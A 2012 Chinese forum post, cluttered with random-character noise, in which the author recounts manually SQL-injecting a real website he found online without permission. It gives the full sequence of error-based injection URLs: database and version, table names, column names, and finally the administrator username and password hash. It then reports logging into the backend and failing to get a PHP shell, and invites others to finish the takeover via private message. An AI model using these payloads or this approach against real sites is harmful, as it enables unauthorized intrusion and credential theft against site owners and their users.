近一直在学习数据库方面的知识,一直在钻研PHP的一些高级注入语法,感觉比较的有意思。于是就在网上找有洞的网站练习手注。于是有了下文。
" |- s! l' n8 N; d, z首先找到网站后台,加了个admin,后台出来了 " z# S6 f7 q( n" k
( e% {5 E# x, |# S9 R% d3 c8 H
# U. l4 k# }4 G/ s# c
然后看了下网站,发现貌似都是html静态网页,但是通过图片链接发现应该是伪静态,于是在后面加了个 ',报错了,初步判断可以注入, f8 H8 n: f* Y, ]
http://www.myhack58.com/Article/UploadPic/2012-12/20121218145843714.jpg 从报错语句中我们可以判断出存在frame_board_conference 表,知道存在frame_board_conference,可以方便我们后面的注入。这里我用的是错误回显注入。 首先查下数据库相关信息。 www.xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*) from+frame_board_conference+group+by+concat(0x3a,concat(0x3a,database(),0x3a,version()),floor(rand(0)*2)))—7 M$ G% L' R6 z2 C
2 w# J3 Z: D6 h+ h* x
C U$ z# W6 R( b4 ?9 x
- T& m$ d4 L; F: P3 O* K& I
5 P, W3 z2 q- l. V! u% ~$ ]http://www.myhack58.com/Article/UploadPic/2012-12/20121218145846722.jpg
9 v' M: F, N: ?4 b% r
% V9 P, l; u& K b& u+ B
$ x/ G& D8 m7 {- H
* }. {( J# H/ c$ n0 g. k; T6 M- i- L" d# T. R
可以看到数据库版本为5.0.32,存在information_schema表,可以进一步的注入。 然后我们查表 http://xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(table_name),1,150)from+information_schema.tables+where+table_schema=database()),0x3a,floor(rand(0)*2)))-- 得到管理员表段frame_administrator5 [, n( n5 S/ z5 j
2 H% b% \3 e. e
. I8 Y$ e0 D5 p+ w6 L* I0 dhttp://www.myhack58.com/Article/UploadPic/2012-12/20121218145846695.jpg! y/ c# _4 P* n; ?7 O
( W; j- ?) d* J+ Q' x' B% B
, B+ f$ O! v3 y
查字段 http://www.xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(column_name),1,150)from+information_schema.columns+where+table_name=0x6672616d655f61646d696e6973747261746f72),0x3a,floor(rand(0)*2)))--
* _8 P$ o3 \2 ~9 o- U# W( \; z2 r
6 I2 m1 ~* [9 C* U# f- O
: h! z' Y+ }5 |- m: D6 _ U0 G; t$ c% ]8 ^) x
得到userID,userPass字段 最后 http://xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(userID,0x3a,userPass,0x0a),1,150)from+frame_administrator),0x3a,floor(rand(0)*2)))--
5 x7 \& U R$ F/ f8 F: L7 m: W, u* I: j" d! z) h5 a% B% I
; L) j7 V% q5 ]& L
* W6 x0 j X* l6 \, C# }; P% |3 _
得到最终结果admin eb0a191797624dd3a48fa681d3061212 解密后成功进入后台,但是在获得shell的过程中出了点问题,可以穿php但是貌似无法解析,不知道什么原因,本人很菜,在这里希望大牛有兴趣的话帮忙拿下shell,感激不尽。Pm我,我把网址发给你。 | 
发表于 2012-12-20 09:00:35
收藏
支持
反对